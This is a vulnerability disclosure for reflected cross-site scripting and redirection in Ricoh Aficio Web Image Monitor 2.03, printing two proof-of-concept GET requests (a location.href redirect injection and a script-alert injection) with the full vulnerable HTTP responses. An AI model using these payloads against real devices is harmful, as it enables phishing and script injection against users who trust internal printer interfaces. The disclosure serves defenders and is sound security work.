Ricoh Aficio Web Image Monitor version 2.03 suffers from cross site scripting and redirection vulnerabilities.
9cb8a3f297c5e5664ca6551ba861cee32ff3b727dc04c87fa31e1cc0c6f6332f
I was poking at some Ricoh MFPs several days ago, when I found this. It is
nothing to get to terribly excited about as it's just a reflected XSS.
However, the ability to abuse any trusted internal IP should be considered a
threat. Companies have taken big hits from less. So without further ado,
here are the petty little details:
Tested successfully on numerous different Ricoh Aficio models, all running
v2.03 of the Web Image Monitor interface. Responses included below are html
encoded for your protection.
Fun with Redirects:
My inital test was just an abuse of the redirect functionality that is being
exploited for the vector.
GET /?";location.href="http://cosine-security.blogspot.com HTTP/1.1
HTTP/1.0 200 OK
Date: Tue, 09 Nov 2010 17:58:00 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Content-Length: 683
Expires: Tue, 09 Nov 2010 17:58:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1;
URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Web Image Monitor</title>
<script language="javascript">
<!--
function jumpPage(){
self.document.cookie="cookieOnOffChecker=on; path=/";
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?";location.href="
http://cosine-security.blogspot.com";
}
// -->
</script>
</head>
<body onLoad="jumpPage()"></body>
</html>
A more traditional XSS test will still work just as well of course:
Traditional Test:
GET /?--></script><script>alert(51494)</script>
HTTP/1.1
HTTP/1.0 200 OK
Date: Fri, 29 Oct 2010 17:43:19 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Content-Length: 672
Expires: Fri, 29 Oct 2010 17:43:19 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1;
URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Web Image Monitor</title>
<script language="javascript">
<!--
function jumpPage(){
self.document.cookie="cookieOnOffChecker=on; path=/";
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?--></script><script>alert(51494)</script>";
}
// -->
</script>
</head>
<body onLoad="jumpPage()"></body>
The same writeup, including a screenshot, can be found at
http://cosine-security.blogspot.com/2010/11/ricoh-web-image-monitor-203-reflected.html